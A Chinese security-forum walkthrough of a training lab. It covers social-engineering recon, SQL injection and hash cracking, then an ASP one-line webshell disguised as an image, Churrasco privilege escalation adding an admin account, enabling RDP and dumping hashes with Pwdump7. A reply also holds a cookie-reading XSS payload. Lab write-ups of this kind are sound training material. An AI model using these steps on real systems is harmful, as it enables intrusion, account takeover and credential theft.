用户
搜索
  • TA的每日心情
    奋斗
    2018-11-14 16:51
  • 签到天数: 317 天

    连续签到: 1 天

    [LV.8]以坛为家I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    11

    主题

    378

    帖子

    2936

    魔法币
    收听
    29
    粉丝
    136
    注册时间
    2015-10-19

    突出贡献春秋文阁核心白帽i春秋签约作者

    发表于 2015-11-24 10:45:24 161428756
    本帖最后由 独狼1927 于 2016-2-19 00:14 编辑

    images00.png

    系列文章:
    03-在线挑战详细攻略-《又见DZ,我能拿你怎么办》
    04-在线挑战详细攻略-《2015中国网络安全大赛:Reinstall真题》
    05-在线挑战详细攻略-《2015中国网络安全大赛:框架漏洞真题》

    Step 0
    实验环境
    操作机:Windows XP [172.16.11.2]
    目标网址:www.test.com  [172.16.12.2]
    ps:www.test.com www.test.ichunqiu都是可以的
    实验工具:
    中国菜刀 ipscan MD5Crack2
    Domain3.6 NTscan字典 saminside
    SuperScan30 X-Scan-v3.3
    亦思想社会工程学字典生成器
    本实验要求获取www.test.com网站的服务器权限。
    ps:图片可单击放大观看。

    Step 1
    从题目要求可以看出,这个实验明显是要突出社会工程学,所以搜集信息就是必须的了,尽可能的搜集!
    打开浏览器,进入网站首页,眼尖的童鞋会发现菜单最右边写着 [摄影论坛],果断进入论坛转转;

    image001.png

    进入论坛后,寻找与linhai有关的信息,发现有他发表的文章,点击斑竹名称 [linhai];

    image002.png

    额~  没有登录还不能查看,那就果断注册吧!点击左侧的[注册] 菜单进入注册页面,不要点上边的注册,进不去;

    image003.png

    点击页面下方的 [我同意] 进行下一步;(不同意不行啊^_^)

    image004.png

    把表单中带星星的都填上,最重要的是记住用户名和密码,别刚注册完就忘了~  (芸芸众生中这样的事情经常发生)

    image005.png

    填完点击 [申请] 进行提交;注册完有了自己的账号后,你就可以看到linhai的信息了,用户名就不用说了,问题里已经给了;

    注意签名栏:生于唐山大地震!中国人应该都知道唐山大地震是哪一年发生的吧~

    image006.png

    Linhai的出生年份已经搞定,回到秋潮视觉工作室首页,页面底部有linhai的电子邮箱,0812很有可能就是linhai的生日;还有他的QQ号:1957692;
    综上所述,我们目前获得的信息包括:
    用户名:Linhai
    出生日期: 1976年08月12日
    QQ:1957692

    顺带着发现了后台入口…

    image007.png

    点击 [管理入口] 就可以进入后台登录页面;

    image008.png

    当然绝大多数后台是不会直接爆出来的,得用工具;
    目录扫描
    工具:御剑   路径:C:\Tools\目录扫描\

    打开御剑,在域名中输入http://www.test.com,开始扫描

    image009.png

    在目录列表中查找后台,发现存在/admin/login.asp

    image010.png

    回到后台登录页面,当然用户名和密码都不知道,利用我们之前获得的社工信息,加上注入,进一步获取用户名和密码。

    Step 2
    工具:旁注WEB综合检测程序Ver3.6修正版
    路径:C:\Tools\注入工具\Domain3.6\Domain3.6.exe

    image011.png

    打开工具,依次点击 [SQL注入] -->[批量扫描注入点] --> [添加网址] --> [批量分析注入点];

    image012.png

    出现下面这个对话框说明已经检测完毕;

    image013.png

    点击OK进行下一步;

    image014.png

    注入点分析完毕后,会在下方列表中显示可注入的地址,选择其中一个地址,右键选择[检测注入];

    image015.png

    检测完毕后,显示可以注入,并列出了数据库类型:Access数据库;

    image016.png

    下面开始逐步 [猜解表名] -->[猜解列名]--> [猜解内容];
    点击 [猜解表名] 后,在数据库列表中会显示3个表,分别是admin、news和config;

    image017.png

    选择admin表,点击 [猜解列名],成功猜解出三个列名id、admin和password;

    image018.png

    勾选admin和password,点击 [猜解内容],右侧列表中成功显示用户名linhai,密码d7e15730ef9708c0

    image019.png

    下一步,打开字典生成器,生成字典;
    工具:亦思想社会工程学字典生成器   
    路径:C:\Tools\社会辅助\亦思想社会工程学字典生成器\亦思想社会工程学字典生成器.exe

    image020.png

    打开社工工具亦思想社会工程学字典生成器,输入之前获得的社工信息,生成字典;

    image021.png

    点击 [生成字典] 之后,会在工具同一目录下生成mypass.txt,这个就是我们需要的字典;

    image022.png

    打开MD5破解工具,准备破解;
    工具:MD5Crack2.exe    路径: C:\Tools\破解工具\MD5\ MD5Crack2.exe

    image023.png

    打开破解工具,输入我们获得的密码密文,选择 [使用字典];

    image024.png

    点击 [浏览] 按钮,选择刚刚生成的社工字典mypass.txt;注意,如果找不见文件,在文件类型中选择全部文件;

    image025.png

    点击 [开始] 按钮进行暴力破解,运气很好,秒破!

    image026.png

    也可以直接上网进行破解,打开http://www.somd5.com,输入让你无语的MD5:d7e15730ef9708c0,因为有人提交过,也是秒破;

    image027.png

    成功找到明文密码:linhai19760812
    下一步:登录后台,上传木马,GETSHELL;

    Setp3

    打开后台登录页面,输入用户名linhai,密码linhai19760812,输入验证码,点击 [登陆] 按钮登录后台;

    image028.png

    成功进入后台!

    image029.png

    点击 [设置管理] --> [系统变量设置],发现系统设置中有上传图片的地方,下一步,构造图片木马;

    image030.png

    在桌面上新建一个文本文件,在里面写入一句话木马
    1. <%Eval Request("ichunqiu")%>
    复制代码
    后面随便输入一些内容,纯粹是为了增加图片体积,但要注意,几十Kb足矣,体积太大太小都不行;

    image031.png

    然后将文件重命名为jpg格式文件;

    image032.png

    打开后台页面,点击 [上传图片],把刚才构造的图片传上去;

    image033.png

    然后点击 [生成代码];

    image034.png

    代码生成后,复制图片路径![很重要]

    image035.png

    关键步骤到了!点击左侧菜单 [数据管理]-->[备份/恢复数据库],把 [数据库路径] 修改为刚才复制的图片路径,[备份的数据库路径] 修改为后缀名为asp的文件,文件名自己取,记住就行,然后点击备份;[ 特别注意:两个路径的最前面都有斜杠 ]

    image036.png

    备份成功!

    image037.png

    打开 [中国菜刀] 连接一句话木马;
    工具:中国菜刀    路径:C:\Tools\webshell\中国菜刀\chopper.exe

    image038.png

    打开菜刀,右键空白处,选择 [添加];

    image039.png

    在地址栏中输入刚才备份数据库的路径,填写连接密码 [密码在一句话里],点击 [添加];

    image040.png

    添加成功后会新增一条记录;

    image041.png

    双击这个URL,成功进入!那个test.asp就是卧底!

    image042.png

    下一步,添加账户-->开启3389-->远程桌面连接-->获取管理员账户密码;

    Step 4

    进入C:\RECYCLER目录,准备上传提权工具;

    image043.png

    提权工具包括Churrasco.exe,3389,cmd,路径:C:\Tools\提权工具\windows

    image044.png

    Churrasco.exe 中文名:巴西烤肉!
    Churrasco.exe是Windows2003系统下的一个本地提权漏洞,通过此工具可以以SYSTEM权限执行命令,从而可以达到添加用户的目的。
    补丁名:KB956572  MS09-012
    使用方法:
    1. Churrasco "net user hacker 123 /add && net localgroup administrators hacker /add"
    复制代码
    两行命令的意思分别是:
    netuser hacker 123 /add  -->添加一个用户名为hacker、密码为123的账户;
    netlocalgroup administrators hacker /add  -->将账户hacker添加到管理员组;
    开始上传工具,选中这三个文件,用鼠标直接拖到中国菜刀中,即可完成上传;

    image045.png

    下一步,执行提权操作;右键cmd.exe,选择 [虚拟终端]

    image046.png

    成功进入,将目录切换到C:\RECYCLER

    image047.png

    用Churrasco.exe执行cmd命令,添加账户;

    1. Churrasco "net user hacker 123 /add"
    复制代码
    image048.png

    账户添加成功,继续下一步,将新增的账户添加到管理员组;

    1. Churrasco "net localgroup administrators hacker /add"
    复制代码
    image049.png

    添加成功,下一步,开启3389;

    1. Churrasco 3389
    复制代码
    image050.png

    如果出现如上图中的命令,说明执行成功了,不成功就多执行几次命令,下一步,连接目标机;
    [开始]-->[运行]-->mstsc

    image051.png

    如果找不见目标IP地址,请点击右上角 [场景拓扑图] 进行查看:

    image052.png

    输入目标IP地址:172.16.12.2,开始连接,继续输入用户名hacker和密码123,进入系统;

    image053.png

    image054.png

    3389连接成功!下一步,获取系统管理员密码,准确的说是获取系统管理员密码的hash,上传密码获取工具 [中国菜刀];
    工具很多,这里我们使用Pwdump7;

    image055.png

    工具:Pwdump7    路径: C:\Tools\提权工具\hash\Pwdump7;[ 注意,一定要将libeay32.dll一并上传,否则执行不了 ]

    image056.png

    上传成功!

    image057.png

    进入目标机,将CMD目录切换到RECYCLER,运行一条命令:

    1. Pwdump7 > hash.txt
    复制代码
    image058.png

    运行成功后,会在同一目录下生成一个文本文件hash.txt;

    image059.png

    打开hash.txt,成功获取到administrator的hash:3C8D6C158F6FB3D1FDCFC2AFB2D1BE34:594B9CD2577A5AC2BE0CA522D5EC6ACE

    image060.png

    暂时切换出实验环境,在你的电脑上打开浏览器输入http://www.objectif-securite.ch/en/ophcrack.php,在页面的相应位置输入hash,然后GO
    ps:如果打不开就翻墙,或者用其他类似功能的网站也可以,这样的站很多;

    image061.png

    最终输出结果:

    image062.png

    Step 5
    数据库sa密码在哪找?
    WEB应用与数据库之间会有一个配置文件,用来保存数据库连接信息,包括数据库驱动、数据库名、用户名、密码等信息,找到这个文件就找到了密码
    文件名:conn_old.asp
    路径: C:\Inetpub\wwwroot\conn_old.asp

    image064.png

    打开文件即可见到Password;

    image065.png

    Step 6
    Linhai论坛登录密码在哪里?
    进入C:\Inetput\wwwroot\bbs\Data\
    发现有ldb文件,一般情况下肯定有mdb文件,看体积应该是dtxy.asp这个文件;

    image066.png

    把这个文件通过菜刀下载到本地,用Domain3.6或其他数据库浏览器工具查询即可;

    image067.png

    把dtxy.asp修改为数据库文件dtxy.mdb;

    image068.png

    打开Domain3.6,点击 [数据库管理]-->[文件]-->[打开数据库],找到文件dtxy.mdb并打开;

    image069.png

    找到表LeadBBS_User,第三条记录就是linhai,密码hash:e10adc3949ba59abbe56e057f20f883e

    image070.png

    暂时撤出实验环境,用你本机的浏览器打开http://www.cmd5.com,输入密文,点击破解~

    image071.png


    本次实验到此结束,希望对大家有所帮助,有不足之处请多多指正!
    下一讲:《又见DZ,我能拿你怎么办》

    ps:部分知识点的内容转自网络;路漫漫其修远兮,感谢一路上黑友们的帮助@lonnyboy;
    Dareand the world always yields.

    --END--





    评分

    参与人数 18魔法币 +88 收起 理由
    加薪zheng + 3
    D_Clay + 1
    cypccpc + 5 牛逼
    凌峰 + 5 我很赞同!
    ichiu + 5 good job
    xunnun + 5 感谢发布原创作品,i春秋论坛因你更精彩!.
    粑粑不小心 + 5
    Kaiho + 4
    张敏 + 5
    Gloomray + 5 谢谢@Thanks!
    v5pingan + 5 我很赞同!
    ssss1 + 5 我很赞同!
    萧逸辰 + 5 讲得很详细,谢谢
    suqmian + 5 已答复!
    kaitoulee + 10 已经处理,感谢您对i春秋论坛的支持!.
    幻泉 + 5
    八戒 + 5 狼头必须五分
    暂无的家 + 5 谢谢@Thanks!

    查看全部评分

    本帖被以下淘专辑推荐:

    发表于 2015-11-24 18:00:03
    Mr_Danny 发表于 2015-11-24 17:08
    狼头,第一题的答案 好像不是linhai19760812啊。。。,还有第三题的SA 密码,,,,这两个该去哪里找啊!! ...

    额,我完了补充吧,重点是写如何拿下服务器,题目里面没有的我会尽快补充的!
    使用道具 举报 回复
    发表于 2018-4-15 09:36:22
    only丶阳 发表于 2016-10-8 11:32
    连接数据库密码不对的问题我是通过把数据库文件拷贝到了RECYCLER目录下再下载用名小子查看的~~~~就不需要 ...

    老哥厉害啊,这是为什么啊?直接下载的数据库会有权限限制吗?
    使用道具 举报 回复
    ich9b9f807fb2 发表于 2017-7-27 11:26
    很多人做完题显示得87分,应该是第二题错了。
    第二题“本实验中论坛是否可以获得webshell”,正确答案是” ...

    本实验中论坛是否可以get shell,注意是【论坛】
    使用道具 举报 回复
    ich9b9f807fb2 发表于 2017-7-27 11:26
    很多人做完题显示得87分,应该是第二题错了。
    第二题“本实验中论坛是否可以获得webshell”,正确答案是” ...

    最后一道题答案是什么,可以说一下吗,谢谢
    使用道具 举报 回复
    发表于 2015-12-10 00:13:20
    已删除 发表于 2015-12-7 23:19
    不知道是什么问题,我是抓包getshell的,菜刀连上一句话时也配置了数据库信息了,数据库管理用不了,执行终 ...

    貌似问题比较多,请加群讨论,i春秋1群:262108018
    使用道具 举报 回复
    发表于 2016-10-30 20:21:20
    only丶阳 发表于 2016-10-8 11:32
    连接数据库密码不对的问题我是通过把数据库文件拷贝到了RECYCLER目录下再下载用名小子查看的~~~~就不需要 ...

    确实这样没有提示输入密码了。
    使用道具 举报 回复
    typhoon 发表于 2016-12-12 20:00
    谢谢 这攻略简直完美。。。另外想请问一下虚拟环境中的各种工具,可以在哪里获取到相对安全一点的呢? ...

    这个真无法保证安全性。
    使用道具 举报 回复
    发表于 2015-11-24 11:06:31
    shafa qqqqqqqqqqqqqq
    使用道具 举报 回复
    发表于 2015-11-24 11:06:49
    沙发是我的
    使用道具 举报 回复
    发表于 2015-11-24 11:07:05
    沙发是我的
    使用道具 举报 回复
    发表于 2015-11-24 11:08:52
    你们真狠,还连占两楼
    使用道具 举报 回复
    发表于 2015-11-24 11:10:46
    给狼头 点赞
    每天看着那些人说自己是什么网红, 土豪, 创始人什么总代理的, 我就呵呵了, 我是共产主义接班人我有说出
    使用道具 举报 回复
    发表于 2015-11-24 11:11:00
    前排~666666666666666666666
    使用道具 举报 回复
    发表于 2015-11-24 11:14:01
    使用道具 举报 回复
    发表于 2015-11-24 11:57:43
    独狼又有新攻略,太赞了!!!{:2_37:}
    使用道具 举报 回复
    发表于 2015-11-24 13:13:40
    很棒~已经奖励魔法币,希望可以多多出类似文章。
    我就是要打你的cookies
    <script>alert(document.cookie)</script>
    使用道具 举报 回复
    发表于 2015-11-24 13:26:10
    赞一个!!什么时候到《又见DZ,我能拿你怎么办》?
    使用道具 举报 回复
    发表于 2015-11-24 13:43:23
    顶顶顶  晚上回来实战实战实战!!!
    是以天下溪水为温柔,昼夜难休。
    使用道具 举报 回复
    发表于 2015-11-24 14:39:03
    新攻略又来了,去做实验~
    使用道具 举报 回复
    发表于 2015-11-24 16:47:34
    狼哥,我来了
    使用道具 举报 回复
    发表于 2015-11-24 17:08:00
    狼头,第一题的答案 好像不是linhai19760812啊。。。,还有第三题的SA 密码,,,,这两个该去哪里找啊!!!
    每天看着那些人说自己是什么网红, 土豪, 创始人什么总代理的, 我就呵呵了, 我是共产主义接班人我有说出
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册